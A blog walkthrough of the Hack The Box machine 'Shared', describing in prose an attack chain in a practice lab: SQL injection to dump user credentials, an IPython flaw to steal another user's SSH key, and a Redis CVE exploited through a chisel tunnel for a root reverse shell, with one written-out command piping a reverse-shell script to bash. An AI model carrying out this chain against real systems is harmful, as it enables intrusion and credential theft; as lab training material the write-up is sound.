Hackthebox — Shared Walkthrough
As always we start off with nmap scan to see which ports are open and which services are running on those ports.
- -sC : run default nmap scripts
- -sV : enumerate service versions
The result shows us that the three ports are open.
- Port 22 is for SSH service
- Port 80 and 443 is for HTTP service
Add “shared.htb” which is revealed by the scan results to our hosts file.
Visit the HTTP service in the browser.
Run a ffuf scan, in the meantime.
And also run wfuzz to scan for potential virtual hosts.
The wfuzz scan result reveals a virtual host.
Add it into the hosts file.
The ffuf scan result reveals a directory called “api”.
Try to visit the page but a login page pops up. None default credentials worked out such as admin/admin, admin/password etc.
Let’s concentrate on the address “checkout.shared.htb”.
Use Burp to intercept the traffic and analyse it.
Send it to the repeater.
Decode from URL-encoded format.
The current size is 3709 bytes.
Insert a SQL injection payload to see if the response behaves differently from the initial response.
The response size is now 3708 bytes.
Let’s dump the database information manually, step by step.
Identified that MariaDB is the database by using “@@version”
What about the tables?
Dump it with SQL query below.
Many tables. The one called “user” might be useful.
Dump the columns of “user” table now.
The output reveals the columns such as id, username and password.
Let’s get them.
Decrypt the hash.
Got the credential.
Time to use the credential to login via SSH as user james_mason onto the machine.
There is 3 different users that have console access permission.
Let’s enumerate the box.
Get the database password.
Login to the database with the credential.
We do not get any useful information in the database.
Download and run linpeas in the box for enumeration.
User james_mason is the member of developer group. The results show that group developer has right to write in /opt/scripts_review directory.
So, we visit the directory but it is empty.
What does directory scripts_review do?
Yes, need more info and will back to this part soon.
Another result from linpeas. We see that there is ipython.
Download and run pspy to snoop on ipython process.
We see that some background processes triggered by the user dan_smith (UID=1001).
The process kills running ipython process then goes to the directory “/opt/scripts_review” and then run ipython again.
We find out an ipython’s vulnerability.
An arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.
So, need to create two new directories as subdirectories of scripts_review, those are called profile_default and startup.
Create a python file.
Here, we create 2 new subdirectories and a python file which will reveal the output of /etc/passwd.
Good! The output shows that we are able exploit the vulnerability.
Time to get user dan_smith’s private key.
Successfully get the private key after execute the command above.
The pspy is monitoring, in the meantime.
And successfully have access to user dan_smith console via SSH.
Capture the user flag.
Privilege Escalation
Download and run linpeas scan again.
The executable file redis_connector_dev is owned by root, but readable and executable by member of sysadmin group.
Since user dan_smith is in the group we are able to read and execute it.
The interesting line is the first line. Since there is no netcat in the box, we will download the binary into our machine and analyse it better.
Run a HTTP service.
Download the binary.
First, start a netcat listener on port 6379 which is default service port of redis, and the run the binary.
We get back the following results. The password of redis appears at the bottom.
Connect redis-cli.
And try to find useful information.
But it did not help.
What is the next move now? Yes, we need to visit Hacktricks.
Pentesting Redis post on Hacktricks reveals a method how CVE-2022–0543 vulnerability could result in remote code execution.
Visit the page and download the PoC.
Since the exploit code needs python and the box does not have python, we will use chisel which allows TCP/UDP tunnelling that transported over HTTP and secured via SSH.
To do so, download chisel.
Download it in the box.
Run chisel as server in our machine.
Run chisel as client in the box.
And we successfully create a reverse port forwarding.
Get the reverse shell payload ready.
Netcat listener is ready on port 9898 for the reverse shell.
Run the exploit script.
Ups.. Did not work.
The last line reveals the problem clearly.
Add the password of redis dev.
The exploit runs successfully.
We did not get the reverse shell back but we see that we are able to execute code as root.
Let’s get the reverse shell!
First, create a bash script called reverse.sh.
Get the part of this command from the PoC script and modify it.
The payload must display the bash script file and then run it as bash command.
"cat /dev/shm/reverse.sh | bash"Execute the command on redis-cli.
Finally, we get the reverse shell and capture the root flag.
We also could get the reverse shell back by modifying the PoC script.
Run it again after modification.
Voila! We are in as root again.
Thank you for your time.
Originally published at http://atalaysblog.wordpress.com on November 12, 2022.
